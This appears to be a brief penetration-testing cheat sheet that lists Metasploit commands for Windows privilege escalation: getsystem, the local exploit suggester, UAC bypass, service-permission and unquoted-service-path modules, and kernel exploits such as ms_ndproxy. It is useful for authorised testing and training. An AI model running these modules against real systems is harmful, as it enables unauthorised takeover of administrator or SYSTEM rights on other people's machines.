control – metasploit privilege escalation

Run post/windows/escalate/getsystem

use post/multi/recon/local_exploit_suggester

use post/windows/escalate/droplnk

use exploit/windows/local/bypassuac

use exploit/windows/local/service_permissions

use exploit/windows/local/trusted_service_path

use exploit/windows/local/ppr_flatten_rec

use exploit/windows/local/ms_ndproxy

use exploit/windows/local/ask